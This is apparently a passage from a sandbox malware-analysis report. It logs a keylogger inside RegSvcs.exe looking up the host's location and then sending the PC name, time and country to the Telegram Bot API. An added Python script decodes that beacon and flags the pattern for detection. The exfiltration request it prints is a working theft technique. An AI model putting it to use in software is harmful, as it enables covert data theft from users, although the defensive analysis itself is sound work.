2025-01-10 22:44:16 UTC | 85 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
2025-01-10 22:44:16 UTC | 865 bytes | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:16 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863846
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NGei6oZbKPA%2BBFTUJSUxr0d2dd9gSX6ebSwbjURB9SSIqbRlSIZT84Xshs4ibCiQUv7%2FwBM7hX%2BEnmi%2FFBCXED1wNSyGuUV383nmy9%2BIjmyplHs7TL%2F%2BlwEJ3qY%2BqJrSAoEFCyP9"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030d5a9420fa8-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1491&rtt_var=561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1949265&cwnd=252&unsent_bytes=0&cid=a681fb5636e761a7&ts=153&x=0"
2025-01-10 22:44:16 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 104.21.16.1 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:18 UTC | 61 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
2025-01-10 22:44:18 UTC | 859 bytes | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:18 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863847
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kHPTmno%2FJ03hv8vyZvE5EcPa20RB1D0UWdmH%2BYh3vCxrsSUv%2FpFoklfchlalb9bHtnfJbkLEhqEo6%2F76V8t5bQHbNqMfCO6A8%2Fx27ysOPzOcesUqx0N5rQrLTdkCEEo1uPdnYK3L"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030dd19934388-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1567&rtt_var=614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1744324&cwnd=221&unsent_bytes=0&cid=e1752d4d6d4a1feb&ts=157&x=0"
2025-01-10 22:44:18 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49746 | 104.21.16.1 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:19 UTC | 85 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
2025-01-10 22:44:19 UTC | 875 bytes | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:19 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863848
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FrdfozFHjr4%2Fz81eAnJvUITOc%2Bot7%2FTZIM%2BP%2FYDItTvsrwEmF1AzWNHtE7ejNLG%2FXznrlJylFgpuwRG%2FcoHO2YUJeNGi%2F5M%2FjqmXYWp%2BHi%2BLZ4cjGOnE1PaEKmnBw%2Fof0bQCcP9E"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030e508760fa8-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1501&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1892417&cwnd=252&unsent_bytes=0&cid=8ecd4d4c608ae152&ts=138&x=0"
2025-01-10 22:44:19 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49750 | 104.21.16.1 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:20 UTC | 85 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
2025-01-10 22:44:20 UTC | 857 bytes | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:20 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863849
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cWjH4%2BApjxbyuy94hMAafqU5VJvIhtFsYNxr86nr6MGGgHt4JcmEfC3fcpJcLAalF%2F0OuahN8BH02Nurxz%2FjPg2IhEOhDLxPLBfE0M7Dc6n1ltl%2F2Cy5NpDlbl5Yk8HQkoFPUXvf"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030ec7ddf7293-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1908&min_rtt=1901&rtt_var=727&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1492079&cwnd=158&unsent_bytes=0&cid=75f4d6ac5920c115&ts=153&x=0"
2025-01-10 22:44:20 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49753 | 104.21.16.1 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:21 UTC | 61 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
2025-01-10 22:44:21 UTC | 857 bytes | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:21 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863850
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HH3%2BWFzatl3wBAO0Gke2TvUBnqTFQl1NaN9tUPVNM%2FPElaIfizUF3eNeM9x5JCV%2BkKcRbF6yfSOylatErKVyFhtCO2pW6xaIvW6x5UFp3ZOksvMphGZWDgOt%2BFR9QHdIDKJjPdR3"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030f44fb17293-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2002&rtt_var=756&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1442687&cwnd=158&unsent_bytes=0&cid=9c7b8e41a41bba2e&ts=139&x=0"
2025-01-10 22:44:21 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49754 | 149.154.167.220 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:22 UTC | 349 bytes | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:39:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                          Host: api.telegram.org
                                                                                                                          Connection: Keep-Alive
2025-01-10 22:44:22 UTC | 344 bytes | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:22 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 55
                                                                                                                          Connection: close
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:44:22 UTC | 55 bytes | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}
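Sessions 4 to 9 above are the keylogger's first-beacon sequence: RegSvcs.exe (PID 7508) queries reallyfreegeoip.org for the country of the analysis host, then sends one `sendMessage` call to the Telegram Bot API whose `text` parameter carries the PC name, the local date and time, and the country it just looked up. The token after `/bot` and the `chat_id` are both empty in the captured URL, which is consistent with the `404 Not Found` reply. The Python below is an added example, not part of the Joe Sandbox report: it rebuilds the request log from the sessions shown here, decodes the Telegram message into its fields, and flags a PID that contacts a geolocation service and then api.telegram.org within a short window. The `GEOIP_HOSTS` set, the 60-second window and the `Key: value` field-parsing rule are assumptions chosen for the example.

```python
"""Decode the Telegram beacon and correlate it with the geolocation lookups
seen in the sessions above. Added example; not part of the Joe Sandbox report."""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Geolocation services the stealer queries before its first beacon. Only the host
# observed in this report is listed; extend it from your own telemetry (assumption).
GEOIP_HOSTS = {"reallyfreegeoip.org"}
TELEGRAM_HOST = "api.telegram.org"
# Bot API paths look like /bot<token>/<method>; an empty token group means the
# captured URL carried no token at all.
BOT_PATH = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)$")

REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
GEOIP_GET = "GET /xml/8.46.123.189 HTTP/1.1"
TELEGRAM_GET = ("GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688"
                "%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:39:57%0D%0ACountry"
                "%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the"
                "%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system"
                "%20storage's%20empty.%20%5D HTTP/1.1")

# Request log constructed from sessions 4-10 of the report:
# (timestamp, pid, process, host, request line).
SESSIONS = [
    ("2025-01-10 22:44:16", 7508, REGSVCS, "reallyfreegeoip.org", GEOIP_GET),
    ("2025-01-10 22:44:18", 7508, REGSVCS, "reallyfreegeoip.org", GEOIP_GET),
    ("2025-01-10 22:44:19", 7508, REGSVCS, "reallyfreegeoip.org", GEOIP_GET),
    ("2025-01-10 22:44:20", 7508, REGSVCS, "reallyfreegeoip.org", GEOIP_GET),
    ("2025-01-10 22:44:21", 7508, REGSVCS, "reallyfreegeoip.org", GEOIP_GET),
    ("2025-01-10 22:44:22", 7508, REGSVCS, "api.telegram.org", TELEGRAM_GET),
    ("2025-01-10 22:44:27", 7924, REGSVCS, "reallyfreegeoip.org", GEOIP_GET),
]


def parse_telegram_beacon(request_line):
    """Return token, method, chat_id and the 'Key: value' fields of the message
    text for a Telegram Bot API request line, or None for anything else."""
    _verb, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    match = BOT_PATH.match(parts.path)
    if not match:
        return None
    # parse_qs percent-decodes the values, so %0D%0A becomes a real CRLF.
    query = parse_qs(parts.query, keep_blank_values=True)
    text = query.get("text", [""])[0]
    fields = {}
    for line in text.splitlines():
        # The bracketed trailer is free text; the report fields are 'Key: value'.
        if ":" in line and not line.lstrip().startswith("["):
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    return {"token": match.group("token"), "method": match.group("method"),
            "chat_id": query.get("chat_id", [""])[0], "fields": fields, "text": text}


def correlate(sessions, window=timedelta(seconds=60)):
    """Flag each process that queries a geolocation service and then calls the
    Telegram Bot API within `window`: the order the keylogger uses for its first
    beacon, which reports the country it has just looked up."""
    alerts = []
    last_geoip = {}  # pid -> time of that process's most recent geolocation request
    for ts, pid, process, host, request in sorted(sessions, key=lambda s: s[0]):
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        if host in GEOIP_HOSTS:
            last_geoip[pid] = when
            continue
        if host != TELEGRAM_HOST or pid not in last_geoip:
            continue
        gap = when - last_geoip[pid]
        beacon = parse_telegram_beacon(request)
        if beacon and gap <= window:
            alerts.append({"pid": pid, "process": process,
                           "seconds_after_geoip": gap.total_seconds(), **beacon})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SESSIONS):
        print(f"PID {alert['pid']} ({alert['process']}) beaconed via Telegram "
              f"{alert['seconds_after_geoip']:.0f}s after a geolocation lookup; "
              f"token={alert['token']!r} chat_id={alert['chat_id']!r}")
        for key, value in alert["fields"].items():
            print(f"  {key}: {value}")
```

Run as a script it reports the single beacon from PID 7508, one second after its last reallyfreegeoip.org lookup, with the empty token and chat_id and the three decoded fields. PID 7924 only performs the geolocation lookups within the captured window, so it produces no alert on its own; in live telemetry the same correlation keyed on the destination host pair, rather than on the request text, survives changes to the message wording.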


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49756 | 104.21.16.1 | 443 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:27 UTC | 85 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
2025-01-10 22:44:28 UTC | 853 bytes | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:27 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863857
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=imuE3CVVrNHQAy9aKTUa3uJFzJIuRh7yyVqF4qG%2FuUtKAc5dzeizgi8U01h8S2ffs0CY801O9JczfgbfI56lYGrmh2zikA%2BtkYyOlDbFxlm6htThaaF1ApOsnb4oAEw5bTJ331Dp"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9000311aa8060fa8-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1442&min_rtt=1431&rtt_var=559&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1919789&cwnd=252&unsent_bytes=0&cid=c6a537ca09b620ff&ts=196&x=0"
                                                                                                                          2025-01-10 22:44:28 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          11 | 192.168.2.4 | 49757 | 104.21.16.1 | 443 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2025-01-10 22:44:28 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:28 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:28 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863857
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fe5omeE%2F7x1etpoukkBHyUHKQHyA25EaS5IbumSLpaxLEAyBS0Ic3abphCHKVw0KuGJh%2BkdAMKIrepKdeoqmJKmoILqyiH2tQ6qYxwLyNL44WnFdqG02%2FTlgpnaGnoFp3iudlL7u"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9000311f9c7c8ce0-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1847&min_rtt=1815&rtt_var=703&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1608815&cwnd=215&unsent_bytes=0&cid=071fad433e90a723&ts=138&x=0"
                                                                                                                          2025-01-10 22:44:28 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          12 | 192.168.2.4 | 49759 | 104.21.16.1 | 443 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
